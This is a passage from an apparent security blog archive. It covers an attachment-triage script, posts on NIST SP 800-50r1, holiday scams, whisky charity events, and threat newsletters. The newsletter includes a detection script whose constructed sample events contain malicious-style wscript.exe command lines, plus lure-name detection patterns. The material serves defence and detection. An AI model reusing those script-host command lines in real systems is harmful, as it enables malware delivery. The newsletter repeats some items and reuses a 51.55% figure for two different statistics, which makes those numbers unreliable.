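def build_sample_docx() -> bytes:
    """Constructed minimal OOXML-shaped archive (not a real document)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<document>Bonus notice</document>")
    return buf.getvalue()


def corrupt_trailer(data: bytes, strip: int = 40) -> bytes:
    """Mimic the campaign's damaged archives: drop the end-of-central-directory
    record, so the local file headers (and the leading PK magic) survive but the
    archive index a parser needs is gone."""
    return data[:-strip]


def triage_attachment(filename: str, data: bytes) -> dict:
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    result = {
        "filename": filename,
        "claims_container": ext in CONTAINER_EXTS,
        "has_pk_magic": data[:4] == b"PK\x03\x04",
        "parses": False,
        "entries": [],
        "verdict": "allow",
    }
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as z:
            result["parses"] = z.testzip() is None   # None: every entry's CRC checked out
            result["entries"] = z.namelist()
    except zipfile.BadZipFile:
        pass
    if result["claims_container"] and not result["parses"]:
        # The file claims to be a document but no scanner can look inside it.
        # Word would offer to "recover" it; hold it for an analyst instead.
        result["verdict"] = "quarantine"
    return result
```

The key observation is in the second test case: a magic-byte check alone says "ZIP", while enumeration fails, and that gap is what the campaign relies on. Quarantining rather than blocking keeps genuinely damaged business documents recoverable by a human, and the QR code inside can then be decoded and its destination checked in a sandbox.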

In News Tags Newsletter, Threat Intelligence

Key Takeaways from NIST SP 800-50r1 – Building a Cybersecurity and Privacy Learning Program

December 2, 2024

In September 2024, the National Institute of Standards and Technology (NIST) released the updated Special Publication (SP) 800-50r1, "Building a Cybersecurity and Privacy Learning Program." This is an update to the 2003 NIST Special Publication (SP) 800-50, Building an Information Technology Security Awareness and Training Program. I hadn’t realized that there was a NIST publication on building a security awareness program. It’s good to see an update after 21 years! Here's a look at the key insights and recommendations from the updated publication. This was written with the help of ChatGPT.

Understanding the Cybersecurity and Privacy Learning Program (CPLP)

Name Change! The document introduces the Cybersecurity and Privacy Learning Program (CPLP) as an overarching framework that includes awareness campaigns, role-based training, and workforce education initiatives. Aimed at fostering a culture of security and privacy, the CPLP is a strategic effort to manage risks and comply with federal regulations, such as FISMA. With privacy becoming a much bigger topic in the last 10 years, rolling it into a cybersecurity awareness program makes sense. This could cross multiple teams depending on how an organization is set up.

CPLP emphasizes awareness and education, incorporating role-specific training alongside general awareness activities, and focuses on encouraging behavior change to reduce risks and foster a culture of security. Continuous improvement is integral, with metrics and evaluations used to adapt programs to evolving needs.

The CPLP Life Cycle

NIST defines a four-phase life cycle for managing CPLPs: Plan and Strategy; Analysis and Design; Development and Implementation; and Assessment and Improvement. These phases involve developing a strategic vision that aligns learning objectives with organizational goals, identifying learning needs and creating tailored program designs, building or procuring learning materials and deploying the program, and measuring effectiveness while refining strategies based on outcomes. This iterative approach ensures that the CPLP remains dynamic and aligned with organizational needs.

Leadership and Organizational Roles

The success of a CPLP hinges on active involvement across all levels of the organization. Senior leadership plays a crucial role in providing strategic direction and resources, while CPLP managers oversee program design, delivery, and metrics. System users, on the other hand, are responsible for adhering to policies and participating in required training. Leadership participation, such as senior leaders engaging in training themselves, reinforces the importance of the program. Leadership buy-in is the first step to getting any sort of program off the ground. Heavily regulated industries are easier to get buy-in for than others.

Metrics and Measurements

Effective CPLPs rely on a mix of quantitative and qualitative metrics to evaluate success. Quantitative metrics include training completion rates, reductions in incidents, and compliance statistics, while qualitative metrics involve employee feedback, focus group discussions, and behavioral observations. NIST emphasizes using these metrics not just for compliance but to drive meaningful behavior change and demonstrate return on investment.

This section was helpful for thinking about what sort of metrics to have. One of the examples brought up is click rate which is a highly volatile statistic. A better statistic is report rate which is a positive behavior an organization wants to encourage within their population. The document doesn’t define what an organization should have for metrics but instead provides guidance.

Integrating Privacy into Cybersecurity Training

One of the standout updates in SP 800-50r1 is the seamless integration of privacy training into cybersecurity programs. It highlights the interconnected nature of these disciplines and the need for training to address both cybersecurity incidents and privacy risks, such as data re-identification or misuse. Teaching employees about privacy risks enables them to recognize potential problems and implement procedures that minimize such risks.

This is big within healthcare. Reports like the Verizon Data Breach Investigations Report (DBIR) show that the healthcare industry has a higher share of internal threat actors, largely due to mistakes and errors in handling information. This can lead to huge privacy implications for the organization.

Tailored Training for Diverse Audiences

CPLPs should be segmented to address specific needs. General users benefit from training on fundamental security practices, such as phishing awareness, while privileged access holders require advanced training on managing sensitive systems. Those in specialized roles undergo deeper training specific to their risks and responsibilities. Tailoring training ensures that it remains relevant and impactful for all user groups.

Easy to suggest, much harder to do. A good starting point is what’s mentioned in the publication: all users; privileged access account holders; new employees; and staff with cybersecurity and privacy responsibilities. Tailored training should be broken down further into departments such as the service desk and finance, but this is a good starting point.

Focusing on Improvement Without Punishment

One of the critical takeaways from NIST SP 800-50r1 is the emphasis on using cybersecurity exercises, such as phishing tests, as opportunities for learning and improvement rather than punishment. The publication highlights the importance of informing employees that these exercises are conducted randomly and that the results will guide future learning activities. Such exercises should not be punitive, nor should employees be singled out for their responses. By framing these activities as learning opportunities, organizations can gather valuable data on vulnerabilities while fostering a supportive environment that encourages employee growth and engagement with cybersecurity practices.

A Culture of Learning

At its core, SP 800-50r1 promotes a culture of continuous learning and adaptation. From onboarding new employees to advanced training for cybersecurity professionals, the document underscores the importance of embedding cybersecurity and privacy awareness into organizational DNA. By viewing cybersecurity and privacy learning as an evolving process, organizations can be prepared for emerging risks and technologies.

Conclusion

NIST SP 800-50r1 offers a robust roadmap for organizations looking to strengthen their cybersecurity and privacy posture, and reading it is a great starting point for any organization building or refreshing its program. A focus on building culture and rewarding people will help change behavior and reduce the human element in incidents.

Explore the full NIST SP 800-50r1 publication here.

In Opinion, Advice Tags NIST, Security Awareness, Privacy

The 12 Scams of The Holiday Seasons: How to Stay Safe This Holiday Season

November 26, 2024

I wrote this for a security awareness program with help from ChatGPT. Feel free to grab and share within your own organizations.

The Better Business Bureau (BBB) has long been a trusted resource for protecting consumers and promoting trustworthy business practices. Their mission to provide valuable insights and tools to stay vigilant against fraud is especially critical during the holidays. This year, the BBB has compiled a list of the "12 Scams of Christmas" to help ensure your festive season remains joyful and scam-free.

Here’s a quick overview of these scams and how to protect yourself:

  1. Fake Social Media Ads: Beware of deals that are too good to be true—they may lead to counterfeit or undelivered goods.

  2. Gift Exchange Scams: Pyramid schemes disguised as “fun” gift exchanges often harvest personal information.

  3. Holiday Apps: Some seemingly festive apps collect data or install malware on your device.

  4. Fake Toll Texts: Scammers target holiday travelers with bogus unpaid toll notifications.

  5. “Free” Gift Cards: Phishing emails offering gift cards often aim to steal sensitive data.

  6. Seasonal Job Scams: Fake job listings trick job seekers into providing personal or financial details.

  7. Impostor Scams: Fraudsters pose as customer service reps or mimic legitimate websites.

  8. Fake Charities: Scammers take advantage of the season’s generosity with fraudulent donation appeals.

  9. Phishing Shipping Notifications: Fake alerts about undelivered packages are phishing attempts.

  10. Advent Calendar Scams: Low-quality or nonexistent calendars sold by untrustworthy vendors.

  11. Shady Pop-Up Shops: Temporary retailers that vanish with your money or sell counterfeit goods.

  12. Too-Good-To-Be-True Travel Deals: Unrealistically low offers designed to scam travelers.

How to Stay Safe:

  • Be skeptical of deals that sound too good to be true.

  • Verify sellers, charities, and offers through trusted sources.

  • Avoid clicking on unsolicited links or emails.

The BBB offers a wealth of information to help you navigate the holiday season safely. For the full list of scams and detailed safety tips, visit their 12 Scams of Christmas page.

This holiday season, let’s protect our wallets and our personal information while spreading cheer and generosity. A little awareness can go a long way in keeping the holidays merry and bright!

In News, Advice Tags Scams

Created by ChatGPT

Whiskey with a Cause: An Inside Look at ILF’s Barrel Pick Adventure

November 14, 2024

The auction for some fabulous whisky is live at Unicorn Auctions until November 21, 2024. Proceeds go to the Innocent Lives Foundation.

You can view the live recording at the ExploreSec YouTube Channel. The audio version of the podcast will hit the podcast feed soon.

At Exploring Information Security, we’re passionate about all things cybersecurity, community, and—every now and then—a great bourbon adventure. In April 2024, I had the chance to join a unique charity experience: a barrel pick trip with the Innocent Lives Foundation (ILF). It was a memorable journey that not only deepened my appreciation for bourbon but also highlighted how a shared passion can turn into a powerful force for good.

The Origins of the ILF Barrel Pick Club

The ILF Barrel Pick Club started with a simple idea: what if they could combine a love for whiskey with a mission to protect children? A few conversations later, this idea grew into a fully-fledged project, allowing whiskey enthusiasts to purchase exclusive barrels with all proceeds supporting ILF’s mission of identifying predators and protecting children. The club's purpose is to create a community where each sip makes a difference. However, getting to that first barrel wasn’t straightforward; with whiskey’s growing popularity, acquiring a quality barrel often requires invites, lotteries, and long waitlists.

An Exclusive Tour of Legendary Distilleries

Our journey led us to Louisville, Kentucky, where we visited some of the country’s most iconic distilleries, including Four Roses and the lesser-known gem Starlight Distillery. These aren’t just whiskey manufacturers—they are stewards of tradition, science, and innovation, each offering distinct qualities that make them unique.

At Four Roses, we were taken behind the scenes and introduced to their precise process, from single-story rickhouses to unique yeast strains. We learned that each barrel tells a story; the location, temperature, and aging process impart distinct flavors and profiles. Four Roses, renowned for its transparent labeling, even indicates barrel location details down to the warehouse tier and barrel direction.

Across the river, we discovered Starlight Distillery, a family-owned operation with a 200-year history in farming and a more recent venture into bourbon-making. Known for experimenting with unique finishes like Mizunara oak (a notoriously tricky Japanese wood), Starlight introduced us to a whole new world of flavors and finishes. It’s a place as much for bourbon as for families, complete with a fun park and farm tours.

Crafting the Perfect Barrel Pick

Picking a barrel is a blend of art and science—and more challenging than one might expect. With guidance from our hosts, we tasted everything from rich caramel to floral and smoky notes. A well-rounded tasting experience involves layers of flavor and aroma that evolve with each sip. This nuanced approach is essential when selecting barrels for auction because our picks aren’t just about finding what tastes good—they have to resonate with the community of experienced drinkers while supporting ILF’s mission.

At each stop, we were welcomed with enthusiasm, kindness, and yes, lots of whiskey. Starlight even donated a bottle of their premium Mizunara cask-aged bourbon to support the ILF auction. The generosity of these distilleries reflects their alignment with ILF’s purpose. It was humbling to see how eager they were to support a mission that matters deeply to us.

Bidding on a Purpose: The ILF Whiskey Auction

The highlight of this journey is the ILF auction, hosted by Unicorn Auctions. Unicorn Auctions has gone above and beyond to support us by waiving all fees, ensuring that every dollar raised goes to ILF’s mission. The auction features exclusive bottles selected during our barrel pick trip, and each bottle represents a unique expression of craftsmanship and generosity.

These bottles aren’t just collectibles; they’re tokens of the ILF mission. Whether you’re an experienced bourbon enthusiast or a newcomer, bidding in the auction allows you to support ILF in a unique way. Proceeds from the auction directly fund ILF’s work in identifying and helping bring child predators to justice, one bottle at a time.

Memorable Moments and Tasting Notes

The trip was full of memorable (and hilarious) moments—like trying to keep our stomachs steady on bumpy Kentucky roads after too many tastings or debating flavor notes (shoutout to Chris for the “pine sol” descriptor!). The tasting process highlighted just how subjective and personal whiskey can be. The complexities of flavor brought out some spirited debates and even a few new friendships.

One of the favorites of the group was the Starlight Double Oak—a rich, complex bourbon with dark spice and caramel notes that had us all captivated. If you’re lucky enough to get your hands on a bottle, it’s worth savoring every sip. For those looking for a unique twist, the Starlight honey finish adds a hint of natural sweetness that’s both unusual and surprisingly smooth.

Raising a Glass to a Cause

At the end of the day, these bottles represent something bigger. Each auction, each barrel, and each sip brings us closer to funding ILF’s crucial work. As we continue to grow the Barrel Pick Club, we’re reminded of the power of community, generosity, and shared passion. This journey has shown us that even something as simple as whiskey can make a profound difference.

If you’re interested in supporting ILF or exploring our latest auction, visit Unicorn Auctions and place a bid. Let’s raise a glass to great bourbon, and an even greater cause.

Created with the help of ChatGPT; edited by Timothy De Block. This post was originally posted on exploresec.com.

In Experiences Tags ILF, Innocent Lives Foundation, Unicorn Auctions, Charity

Created using ChatGPT

Join Us on a Barrel-Picking Adventure with the Innocent Lives Foundation!

November 12, 2024

This week, Exploring Information Security is excited to bring you a unique live recording that steps outside the digital world and into the heart of Kentucky and Indiana distilleries. We’re partnering with the Innocent Lives Foundation (ILF) for a special episode, where we dive into the art and experience of barrel picking. Our adventure took us to two iconic locations—Four Roses and Starlight Distillery—where we set out to find exceptional barrels and create a meaningful connection between the worlds of whiskey and cyber awareness.

Why a Barrel-Picking Adventure?

While cybersecurity and barrel picking might seem worlds apart, this journey is about more than just tasting whiskey. It’s about discovering the unique stories, craftsmanship, and community that make each barrel something special. For this live recording, we’re blending our curiosity for great whiskey with our commitment to the Innocent Lives Foundation’s important mission: protecting children from online exploitation.

Our Trip to Four Roses and Starlight Distillery

Our barrel-picking journey began at Four Roses, known for its distinctive, rich flavor profiles, and continued to Starlight Distillery, where each barrel tells its own story. At each stop, we dove into the meticulous process of selecting barrels, learning how master distillers and their teams create diverse flavors and memorable experiences.

Each barrel pick wasn’t just about taste—it was a sensory experience that engaged sight, smell, and sound. We discovered how small variations in wood, weather, and aging environments can shape a barrel's character and flavor. Selecting a barrel that stood out from the rest required both intuition and collaboration—a bit like finding the right approach to solving cybersecurity challenges.

Behind the Scenes: The Art of Barrel Picking

So, how does one go about picking a barrel? It starts with identifying what makes each barrel unique. From the moment we began the tasting process, we immersed ourselves in a symphony of aromas, textures, and flavors that define each barrel’s character. Some barrels surprised us with unexpected hints of fruit or spice, while others stood out for their smooth, rich finish. These discoveries weren’t just thrilling—they were a reminder of the craftsmanship and care that goes into every bottle.

Memorable Moments and Incredible People

One of the highlights of this journey was meeting the people behind the barrels. We heard stories from master distillers, learned about family traditions that have been passed down for generations, and saw firsthand the dedication it takes to produce high-quality spirits. These connections deepened our appreciation for the process and made each tasting session more meaningful.

Connecting the Dots: How This Adventure Supports ILF’s Mission

While we tasted and shared stories, we kept the Innocent Lives Foundation’s mission at the heart of this journey. ILF is dedicated to protecting children from online predators by working behind the scenes to identify and support law enforcement in bringing these offenders to justice. Each barrel we picked represents a small way to support ILF’s efforts, as proceeds from the sales will go directly to support their work.

For us, this experience was about more than the whiskey—it was about using this adventure to make a difference.

If you’d like to grab your own bottle, head over to Unicorn Auctions!

Join Us Live!

Ready to dive into the world of barrel picking with us? Whether you’re a whiskey enthusiast, a cybersecurity pro, or a supporter of ILF’s mission, this episode promises to be packed with flavor, storytelling, and purpose.

🗓️ Tune in live around 6:30 PM ET on the ExploreSec YouTube Channel. Join us for an unforgettable experience and discover the story behind each barrel we selected!

In Experiences Tags Whiskey, Innocent Lives Foundation, ILF, Charity

November 2024 Executive Leadership Cybersecurity Newsletter

November 12, 2024

This is a monthly newsletter I put together for our executive team with a lean towards healthcare. Created with help from ChatGPT.

Ransomware Threats Surge Globally in 2023 

Summary: The 2023 Global Ransomware Incident Map highlights a 73% rise in ransomware attacks, targeting sectors like healthcare and finance. Cybercriminals are increasingly using "big game hunting" tactics, exploiting vulnerabilities such as the MOVEit flaw. This trend underscores the urgent need for businesses to bolster cybersecurity defenses and improve incident response strategies. 

Further reading: Institute for Security and Technology.

AI Risks in the Workplace 

A recent study by CybSafe revealed that 38% of workers are sharing sensitive information with AI tools, often without their employer's knowledge. This raises significant security concerns, especially since over half of employees have not received training on safe AI use. With the growing reliance on AI, it's crucial for executives to implement clear guidelines and provide training on secure AI practices to mitigate the risk of data breaches and protect intellectual property. 

Further reading: CybSafe - AI Security Risks.

North Korean IT Worker Incident Highlights Hiring Risks 

A recent cyberattack on a company underscores the dangers of unknowingly hiring North Korean operatives. The organization accidentally hired a North Korean IT worker who accessed sensitive data and demanded a ransom. This highlights the need for stringent vetting in remote hiring practices, especially as North Korea increasingly infiltrates global companies. 

Recommended Protections: 

  • Implement strict identity verification for remote workers. 

  • Conduct thorough background checks with global databases. 

  • Regularly monitor employee network activity for unusual behavior. 

Further reading: GBHackers - North Korean IT Worker Incident.

Healthcare Supply Chain Attacks on the Rise 

A recent Proofpoint report reveals that 68% of healthcare workers have faced a supply chain cyberattack, with 82% of these incidents affecting patient care. 

Key Insights: 

  • 68% of healthcare workers report supply chain cyberattacks. 

  • 82% of incidents resulted in disruptions to patient care. 

  • Attacks cause delays in procedures and increase patient risks. 

  • Ransomware and business email compromise are growing threats. 

Further reading: Security Magazine - Supply Chain Attacks.

Change Healthcare Breach – Key Insights and Implications 

In February 2024, Change Healthcare experienced a substantial ransomware attack, compromising the personal, financial, and medical information of approximately 100 million Americans. This incident highlights critical vulnerabilities within the healthcare sector and raises concerns about protecting patient data. 

Key Insights: 

  • Breach Scope: Sensitive data, including Social Security numbers, medical records, and billing information, was exposed, impacting millions of patients. 

  • Financial Impact: UnitedHealth Group, Change Healthcare’s parent company, incurred breach-related costs totaling $2.457 billion, including $1.521 billion in direct response expenses. 

  • Ransom Payment: Change Healthcare paid a $22 million ransom to the BlackCat ransomware group in an attempt to prevent further data exposure. 

Further Reading: Change Healthcare Breach Hits 100M Americans – Krebs on Security

In News Tags Newsletter, Executive Leadership

November 2024 Threat Intelligence Newsletter

November 11, 2024

This is a monthly newsletter I put together for our internal security team with a lean towards phishing and healthcare. Created with help from ChatGPT.

Fake Job Applications Deliver Dangerous Malware 

Summary: A spear-phishing campaign is targeting HR professionals with fake job applications containing the More_eggs malware. Operated by the Golden Chickens group as part of a Malware-as-a-Service (MaaS) platform, More_eggs is a sophisticated backdoor used by multiple threat actors to infiltrate corporate networks. 

Key Insights (Technical): 

  • Delivery Method: The malware is delivered via malicious Windows Shortcut files (.LNK files) disguised as resumes. When opened, these files execute scripts without raising suspicion. 

  • Execution Technique: The attack leverages living-off-the-land binaries (LOLBins) like wscript.exe to run malicious JavaScript code, bypassing traditional security measures. 

  • Capabilities:

      • Backdoor Access: Establishes a stealthy backdoor for persistent access.

      • Payload Deployment: Can download and execute additional malware modules, including ransomware or credential stealers.

      • Reconnaissance: Gathers system information and can move laterally within the network.

      • Command and Control (C2): Communicates with C2 servers over HTTP/S protocols, using encrypted channels to evade detection.

  • Avoidance of Detection: Uses legitimate Windows processes to mask malicious activities, making it harder for security solutions to detect the intrusion.

For further details, read the full article on The Hacker News.

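As an added illustration (not code from the newsletter or the cited Hacker News article), the following Python scores constructed Sysmon-style process-creation events for the chain described above: a script host such as wscript.exe running a script out of a user-writable folder, spawned by explorer.exe the way a double-clicked shortcut or attachment would be. The field names, paths, user names and rule names are assumptions; it also covers the cscript.exe host and the //E:jscript engine override, which goes a little beyond the article's description.

```python
"""Heuristic triage of process-creation events for the script-host delivery
chain described above (.LNK lure -> wscript.exe running JavaScript).

Events use Sysmon Event ID 1 style field names (Image, CommandLine,
ParentImage, User); the sample events below are constructed, not real telemetry.
"""
from __future__ import annotations

import re
import shlex
from dataclasses import dataclass

# Windows Script Host binaries commonly abused as LOLBins.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SCRIPT_EXTS = (".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh")
# Locations an ordinary user can write to; an e-mailed lure lands here, not in System32.
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\(downloads|desktop|appdata)\\|\\temp\\", re.I)
# File names that fit a fake job-application lure (assumed word list).
LURE_WORDS = re.compile(r"resume|curriculum|(?<![a-z])cv(?![a-z])|applicant|candidate", re.I)
# Real WSH switches: //E:<engine> picks the engine regardless of extension,
# //B (batch mode) suppresses error dialogs and prompts.
ENGINE_OVERRIDE = re.compile(r"//e:\s*jscript", re.I)
BATCH_MODE = re.compile(r"//b(?![a-z])", re.I)
SEVERITY_RANK = {"none": 0, "low": 1, "medium": 2, "high": 3}


@dataclass(frozen=True)
class Finding:
    rule: str
    severity: str  # "low" | "medium" | "high"


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _args(command_line: str) -> list[str]:
    """Split a Windows command line; posix=False keeps backslashes as data."""
    try:
        parts = shlex.split(command_line, posix=False)
    except ValueError:  # unbalanced quotes: fall back to a plain whitespace split
        parts = command_line.split()
    return [p.strip('"') for p in parts]


def analyze_event(event: dict) -> list[Finding]:
    """Return findings for one process-creation event (empty list = nothing suspicious)."""
    if _basename(event.get("Image", "")) not in SCRIPT_HOSTS:
        return []
    cmd = event.get("CommandLine", "")
    parent = _basename(event.get("ParentImage", ""))
    args = _args(cmd)[1:]  # drop the host binary itself
    engine_override = bool(ENGINE_OVERRIDE.search(cmd))

    script = next((a for a in args if a.lower().endswith(SCRIPT_EXTS)), None)
    if script is None and engine_override:
        # Engine forced to JScript: the payload may carry any extension (.txt, .dat).
        script = next((a for a in args if not a.startswith("//")), None)
    if script is None:
        return []

    findings: list[Finding] = []
    in_user_path = bool(USER_WRITABLE.search(script))
    if in_user_path:
        findings.append(Finding("script_in_user_writable_path", "medium"))
    if in_user_path and parent == "explorer.exe":
        # explorer.exe as parent is what a double-clicked shortcut or attachment looks like.
        findings.append(Finding("script_host_spawned_by_explorer", "high"))
    if LURE_WORDS.search(_basename(script)):
        findings.append(Finding("script_named_like_job_application", "high"))
    if engine_override:
        findings.append(Finding("engine_override_hides_script_type", "high"))
    if BATCH_MODE.search(cmd):
        findings.append(Finding("batch_mode_suppresses_prompts", "low"))
    return findings


def max_severity(findings: list[Finding]) -> str:
    return max((f.severity for f in findings), key=SEVERITY_RANK.__getitem__, default="none")


def triage(events: list[dict]) -> list[tuple[int, str, list[str]]]:
    """(ProcessId, worst severity, matched rules) for every event that raised a finding."""
    out = []
    for ev in events:
        found = analyze_event(ev)
        if found:
            out.append((ev["ProcessId"], max_severity(found), [f.rule for f in found]))
    return out


# Constructed sample telemetry (process ids, users and paths are invented).
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "Image": r"C:\Windows\System32\cscript.exe",
     "CommandLine": r"cscript.exe //nologo C:\Windows\System32\slmgr.vbs /dlv",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "User": "CORP\\svc_patch"},
    {"ProcessId": 5388, "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'wscript.exe "C:\Users\hr.user\Downloads\John_Doe_Resume.js"',
     "ParentImage": r"C:\Windows\explorer.exe", "User": "CORP\\hr.user"},
    {"ProcessId": 5402, "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"wscript.exe //E:jscript //B C:\Users\hr.user\AppData\Local\Temp\profile.txt",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "User": "CORP\\hr.user"},
    {"ProcessId": 3344, "Image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "CommandLine": r'"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE"',
     "ParentImage": r"C:\Windows\explorer.exe", "User": "CORP\\hr.user"},
]

if __name__ == "__main__":
    for pid, sev, rules in triage(SAMPLE_EVENTS):
        print(f"pid={pid} severity={sev} rules={', '.join(rules)}")
```

The benign slmgr.vbs run produces no finding because it is executed from System32; the two wscript.exe events are the ones an analyst would pull for review.
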
New Ransomware Strain Targeting Healthcare 

The U.S. Department of Health and Human Services (HHS) issued a warning about a new ransomware strain, Trinity, which is actively targeting the healthcare sector. Trinity uses techniques like encrypting data and demanding ransoms within 24 hours. It has connections to other ransomware families such as Venus and 2023Lock. 

Technical Key Insights: 

  • Exploits Remote Desktop Protocol (RDP) and open ports 

  • Uses privilege escalation to gain higher access 

  • Encrypts critical systems rapidly after infiltration 

Further reading: The Record - Trinity Ransomware Alert.

Emerging Cybersecurity Threats Highlighted in HP Wolf Security Report 

The September 2024 HP Wolf Security Threat Insights Report identifies key trends in cyberattacks, including a surge in document-based malware, with 61% of threats delivered via email attachments. Attackers are increasingly using malicious archives and PDFs to bypass detection, leveraging techniques like HTML smuggling and exploiting vulnerabilities in outdated software. Threat actors are also using Generative AI to write sophisticated malware, such as AsyncRAT. 

Key Insights: 

  • 39% of threats delivered in archives 

  • Rise in AI-generated malware 

  • Increased exploitation of known vulnerabilities 

Further reading: HP Wolf Security Threat Insights Report.

North Korean IT Worker Incident Highlights Hiring Risks 

A recent cyberattack on a company underscores the dangers of unknowingly hiring North Korean operatives. The organization accidentally hired a North Korean IT worker who accessed sensitive data and demanded a ransom. This highlights the need for stringent vetting in remote hiring practices, especially as North Korea increasingly infiltrates global companies. 

Recommended Protections: 

  • Implement strict identity verification for remote workers. 

  • Conduct thorough background checks with global databases. 

  • Regularly monitor employee network activity for unusual behavior. 

Further reading: GBHackers - North Korean IT Worker Incident.

User-Centric Security Design Inspired by Disney 

A recent article from KnowBe4 discusses how organizations can improve security by observing how employees naturally work, similar to Disney’s strategy of observing guests before building paths. The concept of "desire paths" shows that security controls should be designed around actual workflows, reducing friction and improving compliance. By aligning security with user behavior, organizations can mitigate risky workarounds and foster a more secure environment. 

Further reading: KnowBe4 - Security Highways.

Healthcare Supply Chain Attacks on the Rise 

A recent Proofpoint report reveals that 68% of healthcare workers have faced a supply chain cyberattack, with 82% of these incidents affecting patient care. 

Key Insights: 

  • 68% of healthcare workers report supply chain cyberattacks. 

  • 82% of incidents resulted in disruptions to patient care. 

  • Attacks cause delays in procedures and increase patient risks. 

  • Ransomware and business email compromise are growing threats. 

Further reading: Security Magazine - Supply Chain Attacks.

Microsoft’s Deceptive Honeypot Strategy Targets Phishers 

Microsoft has launched a clever security strategy by creating fake Azure tenants to lure phishing attackers into honeypots. These realistic tenant environments mimic legitimate setups, tricking attackers into interacting with them. This allows Microsoft to gather valuable intelligence on phishing methods and infrastructure, which can be used to strengthen defenses and share with the wider security community. By engaging with these fake environments, phishers waste time while Microsoft gains crucial insights. 

Further reading: BleepingComputer - Microsoft Honeypots.

Mobile-First Cyber Attacks on the Rise 

Cyber attackers are increasingly adopting a "mobile-first" strategy, as highlighted by a new report from Zimperium. With 83% of phishing sites now targeting mobile devices and a 13% rise in mobile malware, employees’ personal devices pose a growing risk to organizations. As more employees use their smartphones for work-related tasks, organizations need to bolster mobile security and educate employees on safe practices through security awareness training. 

Further reading: KnowBe4 - Mobile-First Attack Strategy.

Cybercriminals Exploiting Steam for Malware Distribution 

A recent investigation highlights how cybercriminals are using Steam profiles to exploit a technique called Dead Drop Resolver (DDR) to hide Command and Control (C2) addresses within user profiles. Attackers have leveraged well-known infostealers like Vidar, Lumma, and MetaStealer to extract sensitive data from infected systems by using platforms like Steam and Telegram to evade detection. 

Technical Key Insights: 

  • Attackers embed C2 addresses in Steam profiles. 

  • Infostealers target credentials and system data. 

  • Use of obfuscated code and stolen certificates. 

Further reading: RT Solar Blog (note: .ru site).

Rise in Phishing Attacks with AI and Impersonation Tactics 

A new report from KnowBe4 reveals a 28% rise in phishing attacks during Q2 2024, with 89% of attacks involving brand impersonation. Cybercriminals are increasingly using AI-powered phishing toolkits, making it easier for less-skilled attackers to execute sophisticated campaigns. Commodity phishing attacks, primarily using hyperlinks, have surged, overwhelming organizations' defenses. With impersonation tactics being a dominant trend, organizations must enhance defenses against these evolving threats. 

Key Insights: 

  • 28% increase in phishing attacks in Q2 2024. 

  • 89% of phishing emails involve impersonation. 

  • Commodity phishing attacks up 2,700% compared to normal baselines. 

Further reading: KnowBe4 Report.

Phishing-as-a-Service Platform "Sniper Dz" Exposed 

A recent investigation reveals the rise of the phishing-as-a-service (PhaaS) platform "Sniper Dz," which is responsible for over 140,000 phishing websites. The platform offers phishing templates targeting major brands and hides malicious content behind proxy servers to evade detection. Additionally, attackers can exfiltrate credentials to centralized servers controlled by Sniper Dz. This growing platform enables less-skilled attackers to launch sophisticated phishing attacks with ease. 

Further reading: Unit 42 - Sniper Dz PhaaS.

Dark Angels Ransomware Group Exposed 

A recent investigation uncovers the stealth tactics of the Dark Angels ransomware group, which targets high-value systems with Babuk and RagnarLocker-based ransomware. Their techniques include double extortion, data exfiltration, and selective ransomware deployment to minimize detection. 

Technical Key Insights: 

  • Uses Babuk ransomware on Windows and RagnarLocker variants on Linux/ESXi servers. 

  • Employs double extortion tactics, stealing data before encryption. 

  • Leverages encrypted communication channels to evade detection. 

Further reading: Zscaler - Dark Angels Ransomware Group.

North Korean IT Worker Fraud 

SecureWorks reports that North Korean IT workers are fraudulently obtaining remote jobs to access sensitive systems and generate revenue for the regime. These individuals disguise their identities, use VPNs to hide their location, and exploit company resources once hired. 

Key Insights: 

  • Perform thorough background checks on freelance and remote candidates. 

  • Monitor network access for unusual activity, especially from VPNs. 

  • Educate hiring managers on this growing threat. 

Further Reading: Fraudulent North Korean IT Worker Schemes

Health Care and Social Assistance Sector at Risk 

Cyber threats in the Health Care and Social Assistance sector are intensifying, with phishing and social engineering attacks being the most prevalent. Organizations need to prioritize automation and Digital Risk Protection strategies to defend against these sophisticated threats. 

Key Insights: 

  • 51.55% of incidents are phishing attacks using spearphishing links. 

  • 24.76% of attacks exploit public-facing applications. 

  • Automation reduces incident containment time to 1 minute, compared to 2 hours 34 minutes for manual responses. 

Further Reading: ReliaQuest Health Care Threat Landscape

AI-Driven Malware and Persistent Ransomware Threats 

Check Point's Global Threat Index for September 2024 highlights the rising use of AI in malware creation, with AsyncRAT becoming one of the top threats. AI-powered scripts are being used to deliver malware like AsyncRAT through techniques such as HTML smuggling, showcasing how threat actors with limited technical skills can now leverage AI to create sophisticated attacks. This evolution underscores the need for organizations to adopt proactive security strategies. 

In addition, RansomHub, a rebranded Ransomware-as-a-Service group, continues to dominate the ransomware scene, accounting for 17% of reported attacks. Other prominent malware families include FakeUpdates, targeting organizations worldwide, and Androxgh0st, which exploits vulnerabilities across platforms. 

Key Insights: 

  • 51.55% of the most prevalent malware was related to phishing campaigns, with AI-driven techniques emerging. 

  • RansomHub remains the top ransomware group with a significant global impact. 

  • Joker leads mobile malware, targeting Android users via SMS theft and premium service fraud. 

Further Reading: Check Point Threat Intelligence Report

Trinity Ransomware Hits Healthcare Sector 

The Trinity ransomware group is targeting healthcare organizations with double-extortion tactics, gaining access through phishing emails and software vulnerabilities. This ransomware not only encrypts data but also steals it, pressuring victims to pay or risk exposure of sensitive information. Two healthcare providers have already been attacked, with 330GB of data compromised from a U.S.-based provider. 

Key Insights: 

  • Double extortion tactics increase the urgency for victims to pay. 

  • Initial access often occurs through phishing or vulnerabilities. 

